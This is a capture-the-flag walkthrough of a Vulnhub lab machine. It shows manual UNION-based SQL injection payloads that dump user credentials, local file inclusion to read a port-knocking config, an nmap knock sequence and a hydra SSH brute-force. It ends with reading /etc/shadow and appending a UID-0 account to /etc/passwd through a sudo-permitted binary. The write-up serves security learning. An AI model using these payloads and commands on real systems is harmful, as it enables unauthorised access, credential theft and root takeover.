This Vulnhub image is a machine that I considered very fun to go through as it allowed me to better understand SQL injection and yet another interesting privilege escalation technique. The machine can be initially exploited by doing SQL injection and gathering some credentials. There is an SSH service which is initially in the state of “filtered” and requires “Port Knocking” to open the port, the information needed can be gathered by leveraging an LFI vulnerability. Privilege escalation requires logging in as a specific user to be able to retrieve some passwords and become another user which has some sudo permissions on a specific file. Overall the machine is very fun and a lot can be learned from it, the SQL injection I used is completely manual without using “sqlmap”.
Scanning and Enumeration
From the output we see that the SSH service is being filtered and only port 80 is open. Browsing to the HTTP service displays the following page:
There is also a search option which seems to look for first names and last names.
If we do a common SQL injection it returns all the information from the “Display All Records” option, this is the SQL injection I used:
test' or 1=1 -- -
Since the SQL injection didn’t gave me any errors, it seemed like it was vulnerable to SQL injection do I started by enumerating the number of columns that I could work with. To enumerate the columns I’ll use the query “order by” starting with number 1 and increasing it until it returns an error or it doesn’t return any information, I’ll test this out using the known first name of “mary” and the syntax of the query will look as follows:
mary' order by 1 -- -
Increasing the number by one we would see that it stops displaying information when doing “order by 7” this means that the number of columns is 6. The next step will be to identify where is the information displayed for each column so I’ll place some numbers to identify each column, and this can be accomplished by the following query:
mary' union all select 1,2,3,4,5,6 -- -
From the screenshot we see the location of each column which is identified by a number. Now that we know where information can be displayed we need to enumerate the database version (assuming this is MySQL) and can be done using the following query:
mary' union all select 1,2,3,4,@@version,6 -- -
The information obtained from determining the version aids in understanding how the queries will be made. The next step is to enumerate the databases using the information schema, this is the query used to list the databases:
mary' union all select 1,2,3,4,schema_name,6 from information_schema.schemata -- -
From this information the “users” database seems the most interesting. For now we will now enumerate the tables to see what’s interesting, the following query was used to enumerate the tables:
mary' union select all 1,2,3,4,table_name,6 from information_schema.tables -- -
mary' union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='UserDetails' -- -
There are 6 fields in total but the ones we are interested in are the “username” and “password” fields. To display only this information from the “UserDetails” I will put the username in column number 4 and the passwords in column 5, this is the query I used:
mary' union all select 1,2,3,concat(username),concat(password),6 FROM users.UserDetails -- -
We will get different usernames and passwords (the screenshot is only a fraction of all).
mary' union all select 1,2,3,concat(username),concat(password),6 FROM Users -- -
With this password I was able to login in as the admin user by going to the “Manage” option.
Once logged in we see at the bottom a message that says “File does not exist” as if it was looking for a file, so trying a very common LFI technique I was able to successfully read files from the system.
Basically all the users that I saw earlier have access to the machine and the passwords we got might allow me to get into the machine, but from the nmap report we know that the SSH port is being filtered, this could mean that is either being restricted by IP maybe or we are dealing with “port knocking”. Taking advantage of the LFI I attempted to read a knockd.conf file if available and was able to successfully get information from such a file.
Great, now all we have to do is to knock the sequence of ports displayed from the file using nmap. Port knocking with nmap using those port numbers can be accomplished with the following command:
nmap -p 7469,8475,9842 --max-retries 0 192.168.80.132
The SSH port was successfully opened. With the credentials I obtained earlier I placed them in two separate files for usernames and passwords, I then used hydra to brute force SSH and see which users will have access through SSH, this is the command I used for hydra:
hydra -L usernames.txt -P passwords.txt 192.168.80.132 ssh
For privilege escalation I started checking for sudo permissions and files in the home directories of the users I had access to and listing the files and directories for the user “janitor” home folder listed a file with some new passwords.
I was able to get valid credentials for the user “fredf” and using SSH to log in as fredf also shows that he has some sudo permissions to execute a file named “test”.
so it seems like I need to give it some parameters and by the suggestion of the words “read” and “append” it seems as if I could read files and append it to a file, so lets try that. I’ll attempt to read the shadow file and append a file to the /tmp folder named “myshadow” with the following command:
sudo /opt/devstuff/dist/test/test /etc/shadow /tmp/myshadow
To become root I thought that it would be great to add another user to the passwd file with root privileges. The process I followed to generate an entry for the new user can be learned from here
https://hacknpentest.com/linux-privilege-escalation-via-writeable-etc-passwd-file/ I’ll first generate an encrypted password using Perl, this is the command I used:
perl -le 'print crypt("mystrongpassword","salt")'
echo "newroot:samIllSUTVKpo:0:0:Similar_to_root:/root:/bin/bash" > /tmp/newuser
sudo /opt/devstuff/dist/test/test /tmp/newuser /etc/passwd